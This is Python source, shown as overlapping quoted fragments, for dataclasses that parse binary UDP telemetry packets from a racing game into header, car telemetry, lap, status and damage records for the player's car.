telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format:", "for each active car car_telemetry_data_list = list() for i in range(22): car_telemetry_data =", "m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form binary", "# Map tyre inner temperature values from list to attributes player_telemetry_message = (", "= {} for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" +", "ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8]", "LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32", "\"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list to attributes", "\"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5],", "= ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\"", "m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod", "def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args: unpacked (list):", "unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def", "m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod", "@dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message:", "( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner", "= ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre", "= cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) ->", "player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData", "ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32", "name used as keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"]", "unpacked[len(asdict(packet_header)) : :] # Get lap data for each active car data_list =", "dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__", "attributes to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4],", "from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap data for each", "CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from", "+ 1) * len(message_format) ] ) data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData", ") def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index", ") ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list to attributes player_telemetry_message", "Classes parse data from binary format and extract player data.\"\"\" import struct import", "from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP package. Args: packet_header", "player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass", "return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10],", "\"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def", "# Map brake damage values from list to attributes player_car_damage_message = ( player_car_damage_message", "| _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData:", "\"\"\"Get single attributes from attributes list and allocate to position on car (fl,", "packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" # Unpack", "len(message_format) ] ) data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16", "Binary representation of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData )", "CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single attributes", "self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map", "packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data from", "def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single attributes from attributes list", "fr, rl, rr). Args: telemetry_values(list): List of telemetry values that should be mapped", "unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class", "damage values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"],", "return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8", ":] # Get telemetry for each active car car_telemetry_data_list = list() for i", ") player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list to attributes player_telemetry_message =", "car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self)", "of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT *", ") player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list to attributes player_telemetry_message =", "1) * len(message_format) ] ) data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\"", "class. binary_message (str): Binary representation of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message,", "class. binary_message (str): Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message,", "telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\"", "PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from", "values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\",", "ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args:", "to construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17],", "(i + 1) * len(message_format) ] ) data_list.append(data) return data_list @dataclass class CarTelemetryData:", "unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry for each active car car_telemetry_data_list", "(PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" # Unpack struct", "to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\")", "brake damage values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes(", "= self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) #", "player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values", "( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from list to", "Map brake temperature values from list to attributes player_telemetry_message = ( player_telemetry_message |", "unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header:", "= self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class", "Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData )", "\"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message (str):", "def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage", "= ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake", "unpacked (list): Unpacked struct containing all attributes to construct CarTelemetryData class. \"\"\" return", "= [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values):", "position on car (fl, fr, rl, rr). Args: telemetry_values(list): List of telemetry values", "| _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from", "ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked:", "@dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8", "\"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) ->", "tyre wear values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes(", "from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", )", "telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version:", "m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH:", "of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header,", "dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message", "(i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3],", "ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse", "from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", )", ") @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader,", "single attributes from attributes list and allocate to position on car (fl, fr,", "struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def", "return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10],", "class attributes. Args: unpacked (list): Unpacked struct containing all attributes to construct CarTelemetryData", "\"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\"", "cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11],", "= unpacked[len(asdict(packet_header)) : :] # Get telemetry for each active car car_telemetry_data_list =", "unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20],", "\"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum:", ") return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps:", "construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18],", "self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear values", "attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") #", "car (fl, fr, rl, rr). Args: telemetry_values(list): List of telemetry values that should", "containing all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2],", "22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header))", "return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], )", "# Map tyre wear values from list to attributes player_car_damage_message = ( player_car_damage_message", "len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header,", "from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", )", "struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) # Remove header from struct", "= \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT =", "m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str):", "Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_damage_data_list", "unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls,", "\"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid:", "class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary", "rr). Args: telemetry_values(list): List of telemetry values that should be mapped to attributes.", "attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") #", "ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float", "unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]),", "@dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8", ": :] # Get lap data for each active car data_list = list()", "= self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class", "] ) data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle:", "self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8", "unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls,", "typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT", "\"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2],", "car telemetry. Classes parse data from binary format and extract player data.\"\"\" import", ") ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list to attributes player_telemetry_message", "= cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) ->", "classes for car telemetry. Classes parse data from binary format and extract player", "* 22), binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) :", "= ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message", "List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP", "PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header:", "player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return", "unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData", "car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy()", "attributes list and allocate to position on car (fl, fr, rl, rr). Args:", "ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16", "unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData:", "ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float", "unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\"", "and extract player data.\"\"\" import struct import ctypes from dataclasses import dataclass, asdict", "Attribute name used as keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\",", "ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP package. Args:", "\"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9],", "struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8],", "m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes.", "unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12],", "active car data_list = list() for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[", "player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list to", "m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier:", "Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_status_data_list", "player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData", "all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13],", "dict: \"\"\"Get single attributes from attributes list and allocate to position on car", "CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player", "List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class", "m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked", "cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass", "# Get telemetry for each active car car_telemetry_data_list = list() for i in", "ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def", "PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create", "attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") #", "representation of package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return", "for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i", "m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time:", "): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message", "binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9],", "unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]),", "class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id:", "(PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list(", "parse data from binary format and extract player data.\"\"\" import struct import ctypes", "values that should be mapped to attributes. attribute_name(str): Attribute name used as keys", "telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version:", "range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) *", "player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from", "player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() )", "data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake:", "class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8],", "to construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8]", "PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str,", "from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\", )", "tyre inner temperature values from list to attributes player_telemetry_message = ( player_telemetry_message |", "m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type:", "\"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from list to", "LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from", "containing all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7],", "\"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message =", "Args: unpacked (list): Unpacked struct containing all attributes to construct 